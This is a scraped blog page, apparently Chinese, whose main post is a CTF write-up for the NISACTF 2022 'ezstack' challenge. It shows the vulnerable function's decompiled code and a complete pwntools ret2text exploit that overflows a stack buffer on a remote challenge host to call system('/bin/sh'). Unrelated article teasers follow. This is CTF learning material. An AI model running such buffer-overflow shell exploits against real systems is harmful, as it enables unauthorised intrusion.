news 2026/5/1 11:44:16

[NISACTF 2022]ezstack

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[NISACTF 2022]ezstack

第一次打CTF——PWN篇学习笔记11

32位的ret2text,偏移值为0x48+4,在ida中查找system和/bin/sh的地址,编写脚本得到flag

ssize_t shell() { _BYTE buf[72]; // [esp+0h] [ebp-48h] BYREF ​ system("echo Welcome to NISACTF"); return read(0, buf, 0x60u); }
from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node5.anna.nssctf.cn",23450) ​ system = 0x08048390 binsh = 0x0804A024 ​ payload = cyclic(0x48 + 4) + p32(system) + p32(0xdeadbeef) + p32(binsh) ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/1 8:43:59

Python编程入门:从零开始理解变量、类型与基础运算

在数字世界的构建中,Python以其简洁优雅的语法成为无数开发者与初学者的首选。今天,就让我们一同揭开Python基础语法的神秘面纱,探索如何用代码与计算机对话。一、初识Python:从计算器到编程语言Python可以看作一个功能强大的计算…

作者头像 李华
网站建设 2026/5/1 9:51:11

畅捷通T+只有MDF文件如何恢复成正常账套

问题现象】 账套物理文件只有 mdf文件,没有ldf文件如何恢复数据? 【解决思路】 1、将mdf文件恢复到数据库中; 【解决方案】中第1-第4步骤 2、检查账套物理文件对应的软件版本及补丁号,保证安装的软件版本及补丁号与账套数据版…

作者头像 李华
网站建设 2026/5/1 10:58:21

Matplotlib基础教程:折线图、柱状图、直方图绘制全解析

Matplotlib是Python生态中最核心的数据可视化库之一,凭借灵活的定制能力和简洁的语法,成为数据分析、科研绘图、报表制作的必备工具。本文将从实战角度出发,手把手教你掌握折线图、柱状图、直方图三种高频图表的绘制方法,覆盖基础…

作者头像 李华
网站建设 2026/4/23 17:34:14

DAY25 常见的降维算法

前言: 在前几天我们主要讨论了关于特征筛选和降维方面的问题,所以在开始今天对常见降维算法进行分析前,我们需要先明确一下特征筛选和降维的区别,特征筛选是关于“取舍”,它在保留特征原始意义的前提下做减法&#xff…

作者头像 李华
网站建设 2026/5/1 9:08:01

8 个MBA课堂汇报工具,AI写作降重推荐

8 个MBA课堂汇报工具,AI写作降重推荐 当论文压力袭来,你是否也在挣扎? MBA学习过程中,课堂汇报、论文写作、文献综述等任务接踵而至,让许多学生感到力不从心。尤其是在面对高重复率要求时,如何在有限的时间…

作者头像 李华